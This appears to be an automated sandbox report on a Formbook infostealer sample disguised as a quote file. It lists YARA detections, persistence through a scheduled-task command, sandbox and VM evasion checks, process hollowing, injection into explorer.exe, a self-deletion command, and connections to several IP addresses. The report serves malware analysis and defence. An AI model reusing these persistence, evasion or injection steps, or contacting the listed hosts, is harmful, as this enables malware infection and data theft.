          Source: quote20210126.exe.exe, 00000006.00000002.702248040.00000000013A3000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamesystray.exej% vs quote20210126.exe.exe
          Source: quote20210126.exe.exe, 00000006.00000002.703364193.000000000165F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs quote20210126.exe.exe
          Source: quote20210126.exe.exeBinary or memory string: OriginalFilenameBase64FormattingOptions.exe> vs quote20210126.exe.exe
          Source: C:\Users\user\Desktop\quote20210126.exe.exeSection loaded: onecoreuapcommonproxystub.dll
          Source: quote20210126.exe.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000006.00000002.701320257.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.701320257.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.2092044926.0000000000750000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.2092044926.0000000000750000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.663461491.0000000003F39000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.663461491.0000000003F39000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.702172131.0000000001370000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.702172131.0000000001370000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.663915045.00000000041FE000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.663915045.00000000041FE000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.702000441.0000000000F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.702000441.0000000000F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.2093805951.0000000002C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.2093805951.0000000002C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.2093723727.00000000029D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.2093723727.00000000029D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.quote20210126.exe.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.quote20210126.exe.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.quote20210126.exe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.quote20210126.exe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: quote20210126.exe.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: nVnzZjnYhVWWZd.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@17/4@23/12
          Source: C:\Users\user\Desktop\quote20210126.exe.exeFile created: C:\Users\user\AppData\Roaming\nVnzZjnYhVWWZd.exeJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6968:120:WilError_01
          Source: C:\Users\user\Desktop\quote20210126.exe.exeMutant created: \Sessions\1\BaseNamedObjects\vVuqKiKGyZXyP
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6808:120:WilError_01
          Source: C:\Users\user\Desktop\quote20210126.exe.exeFile created: C:\Users\user\AppData\Local\Temp\tmpC686.tmpJump to behavior
          Source: quote20210126.exe.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\quote20210126.exe.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\quote20210126.exe.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\quote20210126.exe.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: quote20210126.exe.exeReversingLabs: Detection: 15%
          Source: C:\Users\user\Desktop\quote20210126.exe.exeFile read: C:\Users\user\Desktop\quote20210126.exe.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\quote20210126.exe.exe 'C:\Users\user\Desktop\quote20210126.exe.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\nVnzZjnYhVWWZd' /XML 'C:\Users\user\AppData\Local\Temp\tmpC686.tmp'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Users\user\Desktop\quote20210126.exe.exe C:\Users\user\Desktop\quote20210126.exe.exe
          Source: unknownProcess created: C:\Users\user\Desktop\quote20210126.exe.exe C:\Users\user\Desktop\quote20210126.exe.exe
          Source: unknownProcess created: C:\Users\user\Desktop\quote20210126.exe.exe C:\Users\user\Desktop\quote20210126.exe.exe
          Source: unknownProcess created: C:\Users\user\Desktop\quote20210126.exe.exe C:\Users\user\Desktop\quote20210126.exe.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\quote20210126.exe.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\nVnzZjnYhVWWZd' /XML 'C:\Users\user\AppData\Local\Temp\tmpC686.tmp'
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess created: C:\Users\user\Desktop\quote20210126.exe.exe C:\Users\user\Desktop\quote20210126.exe.exe
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess created: C:\Users\user\Desktop\quote20210126.exe.exe C:\Users\user\Desktop\quote20210126.exe.exe
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess created: C:\Users\user\Desktop\quote20210126.exe.exe C:\Users\user\Desktop\quote20210126.exe.exe
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess created: C:\Users\user\Desktop\quote20210126.exe.exe C:\Users\user\Desktop\quote20210126.exe.exe
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\quote20210126.exe.exe'
          Source: C:\Users\user\Desktop\quote20210126.exe.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\quote20210126.exe.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: quote20210126.exe.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: quote20210126.exe.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: systray.pdb source: quote20210126.exe.exe, 00000006.00000002.702234738.00000000013A0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000009.00000000.677988350.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: systray.pdbGCTL source: quote20210126.exe.exe, 00000006.00000002.702234738.00000000013A0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: quote20210126.exe.exe, 00000006.00000002.702734958.00000000014CF000.00000040.00000001.sdmp, systray.exe, 0000000D.00000002.2095102006.00000000049FF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: quote20210126.exe.exe, 00000006.00000002.702734958.00000000014CF000.00000040.00000001.sdmp, systray.exe, 0000000D.00000002.2095102006.00000000049FF000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000009.00000000.677988350.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 0_2_00AD767E push 00000000h; iretd
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 0_2_061D575A push es; ret
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 0_2_061D8BF4 push es; iretd
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 3_2_0001767E push 00000000h; iretd
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 4_2_003A767E push 00000000h; iretd
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 5_2_002F767E push 00000000h; iretd
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 6_2_0041D075 push eax; ret
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 6_2_0041D0C2 push eax; ret
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 6_2_0041D0CB push eax; ret
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 6_2_0041D12C push eax; ret
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 6_2_00417C67 push 0000006Bh; ret
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 6_2_004175F9 push edx; iretd
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 6_2_0089767E push 00000000h; iretd
          Source: initial sampleStatic PE information: section name: .text entropy: 7.59078944089
          Source: initial sampleStatic PE information: section name: .text entropy: 7.59078944089
          Source: C:\Users\user\Desktop\quote20210126.exe.exeFile created: C:\Users\user\AppData\Roaming\nVnzZjnYhVWWZd.exeJump to dropped file

          Boot Survival:

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\nVnzZjnYhVWWZd' /XML 'C:\Users\user\AppData\Local\Temp\tmpC686.tmp'
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 00000000.00000002.663025131.0000000002F68000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.662953284.0000000002F31000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: quote20210126.exe.exe PID: 244, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: quote20210126.exe.exe, 00000000.00000002.663025131.0000000002F68000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: quote20210126.exe.exe, 00000000.00000002.663025131.0000000002F68000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\quote20210126.exe.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\quote20210126.exe.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 00000000007598E4 second address: 00000000007598EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 0000000000759B4E second address: 0000000000759B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\quote20210126.exe.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 6_2_00409A80 rdtsc
          Source: C:\Users\user\Desktop\quote20210126.exe.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\quote20210126.exe.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\quote20210126.exe.exe TID: 6044Thread sleep time: -50342s >= -30000s
          Source: C:\Users\user\Desktop\quote20210126.exe.exe TID: 4800Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\Desktop\quote20210126.exe.exe TID: 7020Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 7028Thread sleep time: -518000s >= -30000s
          Source: C:\Windows\SysWOW64\systray.exe TID: 5840Thread sleep count: 146 > 30
          Source: C:\Windows\SysWOW64\systray.exe TID: 5840Thread sleep time: -292000s >= -30000s
          Source: C:\Windows\SysWOW64\systray.exe TID: 6228Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
          Source: quote20210126.exe.exe, 00000000.00000002.663025131.0000000002F68000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000009.00000000.677718246.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000009.00000000.684022121.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: quote20210126.exe.exe, 00000000.00000002.663025131.0000000002F68000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000009.00000000.678464910.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000009.00000000.684022121.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000009.00000000.684119760.000000000A716000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAa
          Source: explorer.exe, 00000009.00000002.2112500104.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000009.00000000.684119760.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000009.00000000.677718246.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000009.00000000.677718246.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: quote20210126.exe.exe, 00000000.00000002.663025131.0000000002F68000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000009.00000000.684119760.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: quote20210126.exe.exe, 00000000.00000002.663025131.0000000002F68000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000009.00000000.677718246.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\systray.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 6_2_00409A80 rdtsc
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 6_2_0040ACC0 LdrLoadDll,
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\systray.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\quote20210126.exe.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 150.95.52.72 80
          Source: C:\Windows\explorer.exeNetwork Connect: 192.155.181.96 80
          Source: C:\Windows\explorer.exeNetwork Connect: 107.180.2.197 80
          Source: C:\Windows\explorer.exeNetwork Connect: 143.92.60.97 80
          Source: C:\Windows\explorer.exeNetwork Connect: 3.140.151.209 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.49.23.144 80
          Source: C:\Windows\explorer.exeNetwork Connect: 42.194.179.169 80
          Source: C:\Windows\explorer.exeNetwork Connect: 70.40.220.182 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.215 80
          Source: C:\Windows\explorer.exeNetwork Connect: 23.253.11.194 80
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\quote20210126.exe.exeMemory written: C:\Users\user\Desktop\quote20210126.exe.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\quote20210126.exe.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\quote20210126.exe.exeSection loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\quote20210126.exe.exeSection loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\quote20210126.exe.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\systray.exeThread register set: target process: 3424
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\quote20210126.exe.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\quote20210126.exe.exeSection unmapped: C:\Windows\SysWOW64\systray.exe base address: 8B0000
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\nVnzZjnYhVWWZd' /XML 'C:\Users\user\AppData\Local\Temp\tmpC686.tmp'
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess created: C:\Users\user\Desktop\quote20210126.exe.exe C:\Users\user\Desktop\quote20210126.exe.exe
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess created: C:\Users\user\Desktop\quote20210126.exe.exe C:\Users\user\Desktop\quote20210126.exe.exe
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess created: C:\Users\user\Desktop\quote20210126.exe.exe C:\Users\user\Desktop\quote20210126.exe.exe
          Source: C:\Users\user\Desktop\quote20210126.exe.exeProcess created: C:\Users\user\Desktop\quote20210126.exe.exe C:\Users\user\Desktop\quote20210126.exe.exe
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\quote20210126.exe.exe'
